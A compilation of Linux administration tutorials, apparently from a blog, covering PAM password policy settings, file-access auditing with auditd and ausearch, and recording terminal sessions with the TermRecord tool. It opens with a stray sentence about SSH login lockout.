Let’s try to access via SSH to this server with the incorrect information for 3 times. We will get one email and can not ssh to that server for 1 hour with the user we tried.

How To Setup and Configure Linux Password Policy


Linux Password Policy

User account management is one of the most critical jobs of system admins. In particular, password security should be considered the top concern for any secure Linux system. In this tutorial, we will describe how to set password policy on Linux.

Preparation

Install a PAM module to enable cracklib support, which can provide additional password checking capabilities.

On Debian, Ubuntu or Linux Mint:

$ sudo apt-get install libpam-cracklib

To enforce password policy, we need to modify an authentication-related PAM configuration file located at /etc/pam.d. Policy change will take effect immediately after change.

Note that the password rules presented in this tutorial will be enforced only when non-root users change passwords, but not the root.

Prevent Reusing Old Passwords

Look for a line that contains both “password” and “pam_unix.so”, and append “remember=5″ to that line. It will prevent five most recently used passwords (by storing them in /etc/security/opasswd).

On Debian, Ubuntu or Linux Mint:

$ sudo vi /etc/pam.d/common-password
password [success=1 default=ignore] pam_unix.so obscure sha512 remember=5

Set Minimum Password Length

Look for a line that contains both “password” and “pam_cracklib.so”, and append “minlen=10″ to that line. This will enforce a password of length (10 – <# of types>), where <# of types> indicates how many different types of characters are used in the password. There are four types (upper-case, lower-case, numeric, and symbol) of characters. So if you use a combination of all four types, and minlen is set to 10, the shorted password allowed would be 6.

On Debian, Ubuntu or Linux Mint:

$ sudo vi /etc/pam.d/common-password

password requisite pam_cracklib.so retry=3 minlen=10 difok=3

Set Password Complexity

Look for a line that contains “password” and “pam_cracklib.so”, and append “ucredit=-1 lcredit=-2 dcredit=-1 ocredit=-1″ to that line. This will force you to include at least one upper-case letter (ucredit), two lower-case letters (lcredit), one digit (dcredit) and one symbol (ocredit).

On Debian, Ubuntu or Linux Mint:

$ sudo vi /etc/pam.d/common-password

password requisite pam_cracklib.so retry=3 minlen=10 difok=3 ucredit=-1 lcredit=-2 dcredit=-1 ocredit=-1

Set Password Expiration Period

To set the maximum period of time the current password is valid, edit the following variables in /etc/login.defs.

$ sudo vi /etc/login.defs

PASS_MAX_DAYS 150
PASS_MIN_DAYS 0
PASS_WARN_AGE 7

This will force every user to change their password once every six months, and send out a warning message seven days prior to password expiration.

If you want to set password expiration on per-user basis, use chage command instead. To view password expiration policy for a specific user:

$ sudo chage -l cyberpunk

Last password change : MAY 30, 2014
Password expires : never
Password inactive : never
Account expires : never
Minimum number of days between password change : 0
Maximum number of days between password change : 99999
Number of days of warning before password expires : 7

By default, a user’s password is set to never expire.

To change the password expiration period for user cyberpunk:

$ sudo chage -E 12/31/2014 -m 5 -M 90 -I 30 -W 14 cyberpunk

The above command will set the password to expire on 12/31/2014. In addition, the minimum/maximum number of days between password changes is set to 5 and 90 respectively. The account will be locked 30 days after a password expires, and a warning message will be sent out 14 days before password expiration.

Monitoring File Access On Linux


Monitor File Access

If you are running a mission critical web server, or maintaining a storage server loaded with sensitive data, you probably want to closely monitor file access activities within the server. For example, you want to track any unauthorized change in system configuration files such as /etc/passwd.

To monitor who changed or accessed files or directories on Linux, you can use the Linux Audit System which provides system call auditing and monitoring. In the Linux Audit System, a daemon called auditd is responsible for monitoring individual system calls, and logging them for inspection.

To install auditd on Debian, Ubuntu or Linux Mint:

$ sudo apt-get install auditd
Once installed by apt-get, auditd will be set to start automatically upon boot.

Once you installed auditd, you can configure it by two methods. One is to use a command-line utility called auditctl. The other method is to edit the audit configuration file located at /etc/audit/audit.rules. In this tutorial, I will use the audit configuration file.

The following is an example auditd configuration file.
$ nano /etc/audit/audit.rules

# First rule - delete all
-D

# increase the buffers to survive stress events. make this bigger for busy systems.
-b 1024

# monitor unlink() and rmdir() system calls.
-a exit,always -S unlink -S rmdir

# monitor open() system call by Linux UID 1001.
-a exit,always -S open -F loginuid=1001

# monitor write-access and change in file properties (read/write/execute) of the following files.
-w /etc/group -p wa
-w /etc/passwd -p wa
-w /etc/shadow -p wa
-w /etc/sudoers -p wa

# monitor read-access of the following directory.
-w /etc/secret_directory -p r

# lock the audit configuration to prevent any modification of this file.
-e 2

Once you finish editing the audit configuration, restart auditd.

$ service auditd restart

Once auditd starts running, it will start generating an audit daemon log in /var/log/audit/audit.log as auditing is in progress.

A command-line tool called ausearch allows you to query audit daemon logs for specific violations.

To check if a specific file (e.g., /etc/passwd) has been accessed by anyone, run the following.

$ sudo ausearch -f /etc/passwd

time->Sun May 12 19:22:31 2013
type=PATH msg=audit(1368411751.734:94): item=0 name="/etc/passwd" inode=655761 dev=08:01 mode=0100644 ouid=0 ogid=0 rdev=00:00
type=CWD msg=audit(1368411751.734:94): cwd="/home/cyberpunk"
type=SYSCALL msg=audit(1368411751.734:94): arch=40000003 syscall=306 success=yes exit=0 a0=ffffff9c a1=8624900 a2=1a6 a3=8000 items=1 ppid=14971 pid=14972 auid=0 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=19 comm="chmod" exe="/bin/chmod" key=(null)

The ausearch output above shows that chmod has been applied to /etc/passwd by the root once.

To check if a specific directory (e.g., /etc/secret_directory) has been accessed by anyone, run the following.

$ sudo ausearch -f /etc/secret_directory

time->Sun May 12 19:59:58 2013
type=PATH msg=audit(1368413998.927:108): item=0 name="/etc/secret_directory/" inode=686341 dev=08:01 mode=040755 ouid=0 ogid=0 rdev=00:00
type=CWD msg=audit(1368413998.927:108): cwd="/home/cyberpunk"
type=SYSCALL msg=audit(1368413998.927:108): arch=40000003 syscall=230 success=no exit=-61 a0=bfcdc4e4 a1=b76f0fa9 a2=8c65c70 a3=ff items=1 ppid=2792 pid=11300 auid=1001 uid=1001 gid=1001 euid=1001 suid=1001 fsuid=1001 egid=1001 sgid=1001 fsgid=1001 tty=pts1 ses=2 comm="ls" exe="/bin/ls" key=(null)

The output shows that /etc/secret_directory was looked into by Linux UID 1001.

In this example audit configuration was placed in immutable mode, which means that if you attempt to modify /etc/audit/audit.rules, and restart auditd, you will get the following error.

$ sudo /etc/init.d/auditd restart
Error deleting rule (Operation not permitted)
The audit system is in immutable mode, no rules loaded

If you want to be able to modify the audit rules again after auditd is put in immutable mode, you need to reboot your machine after changing the rules in /etc/audit/audit.rules.

If you want to enable daily log rotation for the audit log generated in /var/log/audit directory, use the following command in a daily cronjob.

$ sudo service auditd rotate

How To Record Terminal Sessions on Linux


Record Terminal Session

There are several online services (e.g., showterm.io or asciinema.org) which allow you to record and share your terminal sessions on the web. However, if you want privacy, or want to archive the recordings locally, we recommend you try TermRecord.

TermRecord is an open-source tool written in Python, which records a terminal session into a standalone HTML file. Since the HTML-formatted output file is self-contained, anyone can replay the captured terminal session using a web browser.

Dependencies

TermRecord depends on three things currently:

  1. A version of the script command supporting recording of timing information into a file (the -toption on modern Linux distributions) or ttyrec
  2. term.js — minified (YUI), and embedded in the static template; MIT License
  3. Google Web Fonts (specifically Ubuntu Mono by default) — base64 encoded and embedded in the static template; Ubuntu Font License 1.0
  4. Jinja2 — Python templating engine; BSD License

Install TermRecord

TermRecord is available as a Python package, so you can install the package with pip command.

First, install pip on your Linux system. Then, install TermRecord as follows.

$ sudo pip install TermRecord

Usage

Just getting started? The defaults are probably fine for you, just specify an output HTML file and go:TermRecord -o mysession.html. For more complex operations checkout TermRecord --help.

There are three main modes of operation: (1) wrap the script program and dump JSON to stdout, (2) wrap the script program and dump HTML to stdout, (3) parse script log files with timing information saving output (JSON or HTML) to a file or dumping to stdout. The last mode is good for converting any old script sessions to HTML or JSON.

Recording a terminal session with TermRecord is easy. Simply run the command below to start recording.

$ TermRecord -o /path/to/output_html

Then any subsequent commands that are typed from the terminal will be saved to the output HTML file. The output file will also store timing information, so that the whole terminal session can be replayed in the same speed as you are typing.

If you want to stop the recording, simply type “exit” and press ENTER.

If you open up the HTML output on a web browser, you can play, pause or restart the stored session. You can also adjust the replay speed, i.e., speed up or slow down the session replay as you like.

Demos

Here is a selection of demos showing off the capabilities of TermRecord across a variety of shell sessions:

More information can be found at: https://github.com/theonewolf/TermRecord